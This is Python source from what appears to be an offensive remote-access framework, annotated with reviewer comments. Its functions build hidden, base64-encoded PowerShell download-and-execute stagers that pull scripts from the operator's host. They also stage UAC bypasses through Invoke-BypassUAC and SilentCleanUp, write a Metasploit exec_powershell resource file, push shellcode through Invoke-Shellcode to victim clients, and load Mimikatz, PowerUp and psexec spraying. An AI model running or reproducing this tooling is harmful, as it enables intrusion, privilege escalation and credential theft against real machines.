def reversePowerShellInvokeMimikatzGeneration(payloadchoice, payloadname):
    """Push a PowerShell script to the connected client and echo its output.

    Args:
        payloadchoice: a ``%``-format template that takes ``(ip, port)``;
            the formatted result is the script sent to the client.
        payloadname: forwarded as the first positional argument of
            ``clientUpload`` (see the NOTE on that call).

    Returns:
        The string ``"pass"`` (the project's menu convention), regardless of
        what the client returned.
    """
    from menu import returnIP
    # Serve ./externalmodules over HTTP on a random free port; the script
    # template receives this ip:port so the client can fetch modules from it.
    moduleport = FUNCTIONS().randomUnusedPort()
    FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False)
    powershellScript = payloadchoice % (returnIP(), moduleport)
    # NOTE(review): the clientUpload defined in this listing takes
    # (powershellExec, isExe, json); this call passes an extra leading
    # positional argument (payloadname). Confirm against the clientUpload that
    # is actually in scope -- as listed, this would raise TypeError.
    clientnumber = int(
        clientUpload(
            payloadname, powershellScript, isExe=False,
            json='{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}'
        ))
    from stager import returnServerList
    # Busy-wait (100 ms polls) on the client's in_buffer until one item arrives,
    # print it, then move on to the next server. Ctrl-C abandons the wait.
    # The handler is looked up by clientnumber on every server without a
    # membership check; a server that does not hold this client raises KeyError.
    try:
        for server in returnServerList():
            while True:
                if server.handlers[clientnumber].in_buffer:
                    print server.handlers[clientnumber].in_buffer.pop()
                    break
                else:
                    time.sleep(0.1)
    except KeyboardInterrupt:
        pass
    return "pass"
def UACBYPASS(self, version):
    """Write a ``uacbypass.rc`` resource file and stage a PowerShell script for it.

    The ``.rc`` file (``run post/windows/manage/exec_powershell ...``) tells a
    Metasploit session to fetch ``stage.ps1`` from this host on ``randomPort``;
    ``stage.ps1`` is served once by ``stagePowershellCode`` in a daemon child
    process. ``version`` selects which script is staged: ``"7"`` or ``"10"``;
    any other value stages nothing but still writes the ``.rc`` file.

    Args:
        version: ``"7"`` or ``"10"`` (string, compared exactly).

    Returns:
        ``self.shellcode`` unchanged.

    Reads ``self.injectshellcode_nosleep`` (a str; encoded as UTF-16LE and
    base64 for PowerShell's ``-enc``) and ``self.shellcode``.
    """
    from menu import returnIP
    randomPort = FUNCTIONS().randomUnusedPort()
    uacbypassrcfilecontents = """run post/windows/manage/exec_powershell SCRIPT="IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/stage.ps1')" SESSION=1""" % (
        returnIP(), randomPort)
    # Second random port: serves ./externalmodules (where the downloaded
    # .ps1 modules referenced below are expected to live).
    moduleport = FUNCTIONS().randomUnusedPort()
    FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False)
    if version == "7":
        uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-BypassUAC.ps1");\nInvoke-BypassUAC -Command \"powershell -enc %s\" """ % (
            returnIP(), moduleport, base64.b64encode(
                self.injectshellcode_nosleep.encode('utf_16_le')))
        # Daemon process: it chdirs and serves a single request (see
        # stagePowershellCode), so it is isolated from this process's cwd.
        a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode,
                                    args=(uacbypassfilecontent, randomPort))
        a.daemon = True
        a.start()
    elif version == "10":
        uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-SilentCleanUpBypass.ps1");\nInvoke-SilentCleanUpBypass -Command \"cmd /c powershell -WindowStyle Hidden -enc %s && REM\" """ % (
            returnIP(), moduleport, base64.b64encode(
                self.injectshellcode_nosleep.encode('utf_16_le')))
        a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode,
                                    args=(uacbypassfilecontent, randomPort))
        a.daemon = True
        a.start()
    # Written to the current working directory. The explicit close() is
    # redundant inside the with-block (the context manager closes the file).
    with open('uacbypass.rc', 'w') as uacbypassfilerc:
        uacbypassfilerc.write(uacbypassrcfilecontents)
        uacbypassfilerc.close()
    return self.shellcode
def printListener(printit=True, returnit=False):
    """Prompt for bind/reverse mode, write and serve the PowerShell stager, and register a listener.

    Flow: prompt until ``b`` or ``r`` is entered; render
    ``lib/powershell/stager.ps1`` with ``(bind_flag, ip, port)`` (reverse uses
    5555, bind uses 5556); write it to ``payloaddir()/p.ps1``; serve that
    directory on a random port; build a one-liner that downloads it; then add
    a ``Server`` to the module-level ``serverlist`` unless one for that port
    is already present (checked by substring on ``str(serverlist)``).

    Args:
        printit: print the one-liner to the terminal.
        returnit: return the one-liner instead of ``"pass"``.

    Returns:
        The one-liner string when ``returnit`` is true, else ``"pass"``.
    """
    from listener import Server
    from menu import returnIP
    powershellFileName = 'p.ps1'
    while True:
        bindOrReverse = prompt_toolkit.prompt('[?] (b)ind/(r)everse: ', patch_stdout=True,
                                              completer=WordCompleter(['b', 'r'])).lower()
        if bindOrReverse == 'b' or bindOrReverse == 'r':
            break
    # The template file is opened without a with-block; the handle is only
    # released when the object is garbage-collected (refcounting in CPython).
    if bindOrReverse == 'r':
        powershellContent = open('lib/powershell/stager.ps1', 'r').read()
        windows_powershell_stager = powershellContent % ('False', returnIP(), '5555')
    if bindOrReverse == 'b':
        powershellContent = open('lib/powershell/stager.ps1', 'r').read()
        windows_powershell_stager = powershellContent % ('True', '', '5556')
    with open((payloaddir() + '/' + powershellFileName), 'w') as powershellStagerFile:
        powershellStagerFile.write(windows_powershell_stager)
        powershellStagerFile.close()  # redundant: the with-block already closes it
    randoStagerDLPort = FUNCTIONS().randomUnusedPort()
    FUNCTIONS().DoServe(returnIP(), powershellFileName, payloaddir(), port=randoStagerDLPort, printIt=False)
    # str.encode('base64') is Python 2 only (codec removed from str in Py3);
    # the newline stripping undoes the codec's 76-column line wrapping.
    stagerexec = 'powershell -w hidden -noni -enc ' + (
        "IEX (New-Object Net.Webclient).DownloadString('http://" + returnIP() + ":" +
        str(randoStagerDLPort) + "/" + powershellFileName + "')"
    ).encode('utf_16_le').encode('base64').replace('\n', '')
    if printit:
        print t.bold_green + '[!] Run this on target machine...' + t.normal + '\n\n' + stagerexec + '\n'
    # Duplicate-listener check is a substring test on the repr of serverlist,
    # so any repr containing "5556"/"5555" (e.g. another port 15556) matches.
    if bindOrReverse == 'b':
        if not '5556' in str(serverlist):
            ipADDR = raw_input('[?] IP Address of target (after executing stager): ')
            connectserver = Server(ipADDR, 5556, bindsocket=False)
            serverlist.append(connectserver)
    if bindOrReverse == 'r':
        if not '5555' in str(serverlist):
            listenerserver = Server('0.0.0.0', 5555, bindsocket=True)
            serverlist.append(listenerserver)
    if returnit:
        return stagerexec
    else:
        return "pass"
def clientUpload(powershellExec, isExe, json):
    """Queue a base64/UTF-16LE encoded PowerShell payload on a selected client's out_buffer.

    Args:
        powershellExec: when ``isExe`` is true, raw shellcode passed to
            ``FUNCTIONS().powershellShellcodeLayout``; otherwise the PowerShell
            text to send as-is.
        isExe: selects the shellcode-wrapping path above.
        json: a ``%``-format template (one ``%s``) that wraps each chunk
            into the message appended to ``out_buffer``. Shadows the stdlib
            ``json`` module name inside this function.

    Returns:
        The client number chosen by ``checkUpload()``, or ``False`` when no
        client was selected (falsy ``checkUpload()`` result).

    Side effects: may start an HTTP server for ./externalmodules; appends to
    the ``out_buffer`` of every server in the module-level ``serverlist`` that
    holds ``clientnumber``; sleeps 0.5 s per chunk.
    """
    from menu import returnIP
    from encrypt import getSandboxScripts
    clientnumber = checkUpload()
    if clientnumber:
        if isExe:
            newpayloadlayout = FUNCTIONS().powershellShellcodeLayout(powershellExec)
            moduleport = FUNCTIONS().randomUnusedPort()
            FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False)
            # getSandboxScripts('powershell') is prepended; its content is
            # defined in encrypt.py and not visible here.
            encPowershell = getSandboxScripts('powershell')
            encPowershell += "IEX(New-Object Net.WebClient).DownloadString('http://%s:%s/Invoke-Shellcode.ps1');Start-Sleep 30;Invoke-Code -Force -Shellcode @(%s)" % (
                returnIP(), moduleport, newpayloadlayout.rstrip(','))
            encPowershell = base64.b64encode(encPowershell.encode('UTF-16LE'))
            # Outer wrapper picks the 32-bit PowerShell on amd64 hosts; the
            # inner encoded script is embedded twice (once per branch).
            # Backslashes in the path string are literal except the escaped
            # "\\v" -- do not "normalise" them.
            fullExec = "$Arch = (Get-Process -Id $PID).StartInfo.EnvironmentVariables['PROCESSOR_ARCHITECTURE'];if($Arch -eq 'x86'){powershell -exec bypass -enc \"%s\"}elseif($Arch -eq 'amd64'){$powershell86 = $env:windir + '\SysWOW64\WindowsPowerShell\\v1.0\powershell.exe';& $powershell86 -exec bypass -enc \"%s\"}" % (
                encPowershell, encPowershell)
            b64Exec = base64.b64encode(fullExec.encode('UTF-16LE'))
            lenb64 = len(b64Exec)  # unused
        else:
            b64Exec = base64.b64encode(powershellExec.encode('UTF-16LE'))
            lenb64 = len(b64Exec)  # unused
        # checkPayloadLength is defined elsewhere; it returns a falsy value or
        # a list of chunks when the payload must be sent in pieces.
        # NOTE(review): the statement nesting below was reconstructed from a
        # collapsed one-line listing; confirm the position of the two
        # time.sleep(0.5) calls against the real file.
        splitPayoad = checkPayloadLength(b64Exec)
        if splitPayoad:
            for p in splitPayoad:
                for server in serverlist:
                    if clientnumber in server.handlers.keys():
                        server.handlers[clientnumber].out_buffer.append(json % (p))
                        time.sleep(0.5)
            time.sleep(0.5)
            # Terminator message: tells the client the multi-part payload is
            # complete ("multiple":"exec").
            for server in serverlist:
                if clientnumber in server.handlers.keys():
                    server.handlers[clientnumber].out_buffer.append(
                        '{"type":"", "data":"", "sendoutput":"false", "multiple":"exec"}'
                    )
        else:
            for server in serverlist:
                if clientnumber in server.handlers.keys():
                    server.handlers[clientnumber].out_buffer.append(json % (b64Exec))
        return clientnumber
    else:
        return False
def ALLCHECKS(self):
    """Write ``allchecks.ps1`` (a one-line loader for PowerUp.ps1) and serve ./externalmodules.

    The script is written to the current working directory and points at
    this host on a random port, where ``PowerUp.ps1`` is expected to be
    served from ``./externalmodules``.

    Returns:
        ``self.shellcode`` unchanged.
    """
    from menu import returnIP
    moduleport = FUNCTIONS().randomUnusedPort()
    FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False)
    with open('allchecks.ps1', 'w') as allchecksfile:
        allchecksfile.write(
            """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/PowerUp.ps1");invoke-allchecks""" % (returnIP(), moduleport))
        allchecksfile.close()  # redundant: the with-block already closes it
    return self.shellcode
def randomUnusedPort(self):
    """Return a TCP port that was free on ``returnIP()`` at the moment of the call.

    Binds an ephemeral port (port 0), reads the number the OS assigned, and
    closes the socket. The port is released before the caller binds it, so
    another process may grab it in between (inherent race in this pattern).
    The socket is not wrapped in a with-block; an exception from ``bind``
    leaves it to be closed by garbage collection.

    Returns:
        int: the port number.
    """
    from menu import returnIP
    s = socket.socket()
    s.bind((returnIP(), 0))
    port = s.getsockname()[1]
    s.close()
    return port
def UACBypassGeneration(payloadchoice, payloadname):
    """Serve ./externalmodules, build a stager via ``printListener`` and upload a script to the client.

    Args:
        payloadchoice: used as a ``%``-format template taking
            ``(ip, port, encoded_stager)`` on one line and then *called*
            (``payloadchoice()``) on the next -- see the NOTE below.
        payloadname: unused in this function.

    Returns:
        The string ``"pass"``.
    """
    from menu import returnIP
    moduleport = FUNCTIONS().randomUnusedPort()
    FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False)
    # printListener(printit=False, returnit=True): returns the stager
    # one-liner without printing it (and registers the listener as a side
    # effect).
    encoded = printListener(False, True)
    powershellScript = payloadchoice % (returnIP(), moduleport, encoded)
    # NOTE(review): powershellScript is built above but never used; the
    # upload instead passes payloadchoice(), which treats the same object as
    # a callable. Both usages cannot be valid for one type -- confirm what
    # callers pass as payloadchoice.
    clientnumber = int(
        clientUpload(
            payloadchoice(), isExe=False,
            json='{"type":"script", "data":"%s", "sendoutput":"false", "multiple":"false"}'
        ))
    print t.bold_green + '\n[*] If UAC Bypass worked, expect a new admin session' + t.normal
    return "pass"
def DoPayloadUpload(payloadname):
    """Ask how to deliver a generated payload and dispatch accordingly.

    Interactive prompt: ``p``/``psexec`` hands ``payloaddir()/<payloadname>.exe``
    to ``DoPsexecSpray``; ``y`` or an empty answer serves ``payloadname`` from
    ``payloaddir()`` on fixed port 8000 via ``FUNCTIONS().DoServe``; any other
    answer (including ``n``) does nothing. Always returns ``None``.

    Args:
        payloadname: payload file name inside ``payloaddir()`` (the ``.exe``
            suffix is appended only for the psexec path).
    """
    from menu import returnIP
    want_to_upload = raw_input('\n[*] Upload To Local Websever or (p)sexec? [y]/p/n: ')
    if want_to_upload.lower() == 'p' or want_to_upload.lower() == 'psexec':
        DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe')
    elif want_to_upload.lower() == 'y' or want_to_upload.lower() == '':
        # Port 8000 is hard-coded here, unlike the random ports used elsewhere
        # in this file; DoServe presumably reports a bind failure itself.
        FUNCTIONS().DoServe(returnIP(), payloadname, payloaddir(), port=8000, printIt=True)
def stagePowershellCode(self, powershellFileContents, port):
    """Write ``stager/stage.ps1``, serve exactly one HTTP request, then delete the directory.

    Changes the *process-wide* working directory into ``stager`` for the
    duration of the request and back to ``..`` afterwards; the callers in
    this file run it in a daemon ``multiprocessing.Process`` so the parent's
    cwd is unaffected. ``HANDLER`` is defined elsewhere in the module.

    Args:
        powershellFileContents: text written verbatim to ``stage.ps1``.
        port: TCP port to bind on ``returnIP()``.

    Returns:
        ``None``.

    Notes:
        - Only one request is served (``handle_request``), so a second client
          or a non-matching first request gets nothing.
        - The server is never ``server_close()``d; the listening socket is
          released when the (daemon) process exits.
        - If ``handle_request`` raises, cwd stays in ``stager`` and the
          directory is not removed (no try/finally).
    """
    from menu import returnIP
    DIR = 'stager'
    if not os.path.isdir(DIR):
        os.mkdir(DIR)
    os.chdir(DIR)
    with open('stage.ps1', 'w') as psFile:
        psFile.write(powershellFileContents)
    httpd = SocketServer.TCPServer((returnIP(), port), HANDLER)
    httpd.handle_request()
    os.chdir('..')
    import shutil
    shutil.rmtree(DIR)
def reverseIpAndPort(port):
    """Prompt for a callback port and IP, falling back to ``port`` and ``returnIP()``.

    Args:
        port: default port as a *string* (it is concatenated into the prompt
            and returned unchanged when the user presses Enter).

    Returns:
        ``(portnum, ipaddr)`` -- both strings as typed, with no validation of
        either value.
    """
    from menu import returnIP
    portnum = raw_input('\n[*] Press Enter For Default Port(%s)\n[*] Port> ' % (t.bold_green + port + t.normal))
    # ``is 0`` is an identity test that only works because CPython caches
    # small ints; the equivalent intent is ``== 0`` (as used for ipaddr below).
    if len(portnum) is 0:
        portnum = port
    IP = returnIP()
    # NOTE(review): IP is embedded in the prompt before the ``if not IP`` check
    # below; if returnIP() signals failure with None (rather than ''), the
    # string concatenation here raises TypeError first and the manual-entry
    # fallback is never reached. Confirm returnIP()'s failure value.
    ipaddr = raw_input('\n[*] Press Enter To Get Local Ip Automatically(%s)\n[*] IP> ' % (t.bold_green + IP + t.normal))
    if len(ipaddr) == 0:
        ipaddr = IP
    if not IP:
        print t.bold_red + 'Error Getting Ip Automatically' + t.normal
        ipaddr = raw_input('\n[*] Please Enter Your IP Manually(Automatic Disabled)\n[*] IP> ')
    return (portnum, ipaddr)